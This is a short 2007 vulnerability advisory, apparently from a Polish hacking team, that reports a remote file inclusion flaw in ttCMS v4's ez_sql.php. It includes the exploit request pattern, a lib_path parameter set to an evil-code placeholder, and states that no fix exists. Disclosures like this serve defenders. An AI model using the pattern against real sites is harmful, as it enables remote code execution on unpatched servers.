ttCMS <= v4 (ez_sql.php lib_path) Remote File Inclusion Vulnerability

2007-03-24 00:00:00

DEVIL TEAM - HACKING POLISH TEAM

Author: Kacper (a.k.a Rahim)
Contact: [email protected]
Homepage: http://www.rahim.webd.pl/
Irc: irc.milw0rm.com:6667 #devilteam
--------------------------------------------
Pozdro dla wszystkich z kanalu IRC oraz forum DEVIL TEAM.



ttCMS <= v4 (ez_sql.php lib_path) RFI Vulnerability
script download/homepage: http://www.ttcms.com/v4/


--------------------------------------------
Vulnerabilities:

http://site.com/ttCMS_path/lib/db/ez_sql.php?lib_path=[evil_code]

#

Fixes

No fixes

In order to submit a new fix you need to be registered.